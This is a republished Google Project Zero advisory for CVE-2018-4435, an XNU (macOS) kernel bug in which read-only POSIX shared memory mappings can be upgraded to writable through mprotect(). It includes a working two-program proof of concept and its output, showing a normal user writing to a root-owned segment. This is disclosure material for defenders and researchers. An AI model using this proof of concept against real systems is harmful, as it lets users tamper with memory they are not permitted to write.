首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
XNU POSIX Shared Memory Mapping Issue
来源:Google Security Research 作者:jannh 发布时间:2018-12-12  
XNU: POSIX shared memory mappings have incorrect maximum protection 

CVE-2018-4435


When the mmap() syscall is invoked on a POSIX shared memory segment
(DTYPE_PSXSHM), pshm_mmap() maps the shared memory segment's pages into the
address space of the calling process. It does this with the following code:

        int prot = uap->prot;
        [...]
        if ((prot & PROT_WRITE) && ((fp->f_flag & FWRITE) == 0)) {
                return(EPERM);
        }
        [...]
        kret = vm_map_enter_mem_object(
                user_map,
                &user_addr,
                map_size,
                0,
                VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE,
                vmk_flags,
                VM_KERN_MEMORY_NONE,
                pshmobj->pshmo_memobject,
                file_pos - map_pos,
                docow,
                prot,
                VM_PROT_DEFAULT, 
                VM_INHERIT_SHARE);

vm_map_enter_mem_object() has the following declaration:

        /* Enter a mapping of a memory object */
        extern kern_return_t    vm_map_enter_mem_object(
                vm_map_t                map,
                vm_map_offset_t         *address,
                vm_map_size_t           size,
                vm_map_offset_t         mask,
                int                     flags,
                vm_map_kernel_flags_t   vmk_flags,
                vm_tag_t                tag,
                ipc_port_t              port,
                vm_object_offset_t      offset,
                boolean_t               needs_copy,
                vm_prot_t               cur_protection,
                vm_prot_t               max_protection,
                vm_inherit_t            inheritance);

This means that `cur_protection` (the initial protection flags for the new memory
object) will be `prot`, which contains the requested protection flags, checked
against the mode of the open file to ensure that a read-only file descriptor can
only be used to create a readonly mapping. However, `max_protection` is always
`VM_PROT_DEFAULT`, which is defined as `VM_PROT_READ|VM_PROT_WRITE`.

Therefore, an attacker with readonly access to a POSIX shared memory segment can
first use mmap() to create a readonly shared mapping of it, then use mprotect()
- which is limited by `max_protection` - to gain write access.


To reproduce:

In terminal 1, as root:
=========================================
bash-3.2# cat > create.c
#include <sys/mman.h>
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <stdio.h>
int main(void) {
  shm_unlink("/jh_test");
  int fd = shm_open("/jh_test", O_RDWR|O_CREAT|O_EXCL, 0644);
  if (fd == -1) err(1, "shm_open");
  if (ftruncate(fd, 0x1000)) err(1, "trunc");
  char *map = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
  if (map == MAP_FAILED) err(1, "mmap");
  printf("map[0] = 0x%hhx\n", (unsigned char)map[0]);
  printf("press enter to continue\n");
  getchar();
  printf("map[0] = 0x%hhx\n", (unsigned char)map[0]);
}
bash-3.2# cc -o create create.c && ./create
map[0] = 0x0
press enter to continue
=========================================

In terminal 2, as user:
=========================================
Projects-Mac-mini:posix_shm projectzero$ cat > open.c
#include <sys/mman.h>
#include <fcntl.h>
#include <err.h>
#include <stdio.h>

int main(void) {
  int fd = shm_open("/jh_test", O_RDWR);
  if (fd == -1) perror("open RW");

  fd = shm_open("/jh_test", O_RDONLY);
  if (fd == -1) err(1, "open RO");

  char *map = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
  if (map == MAP_FAILED) perror("map RW");

  map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, fd, 0);
  if (map == MAP_FAILED) err(1, "map RO");

  if (mprotect(map, 0x1000, PROT_READ|PROT_WRITE)) err(1, "mprotect");

  map[0] = 0x42;
}
Projects-Mac-mini:posix_shm projectzero$ cc -o open open.c && ./open
open RW: Permission denied
map RW: Operation not permitted
Projects-Mac-mini:posix_shm projectzero$ 
=========================================

Then, in terminal 1, press enter to continue:
=========================================

map[0] = 0x42
bash-3.2# 
=========================================

This demonstrates that the user was able to write to a root-owned POSIX shared
memory segment with mode 0644.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.



Found by: jannh


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MiniShare 1.4.1 HEAD / POST Bu
·Google Chrome 70.0.3538.77 Cro
·FutureNet NXR-G240 Series Shel
·CyberLink LabelPrint 2.5 Stack
·i-doit CMDB 1.11.2 - Remote Co
·WebKit JIT Proxy Object Issue
·Textpad 8.1.2 - Denial Of Serv
·Linux userfaultfd tmpfs File P
·HasanMWB 1.0 SQL Injection
·LanSpy 2.0.1.159 Buffer Overfl
·NUUO NVRMini2 3.9.1 - Authenti
·SmartFTP Client 9.0.2623.0 Den
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved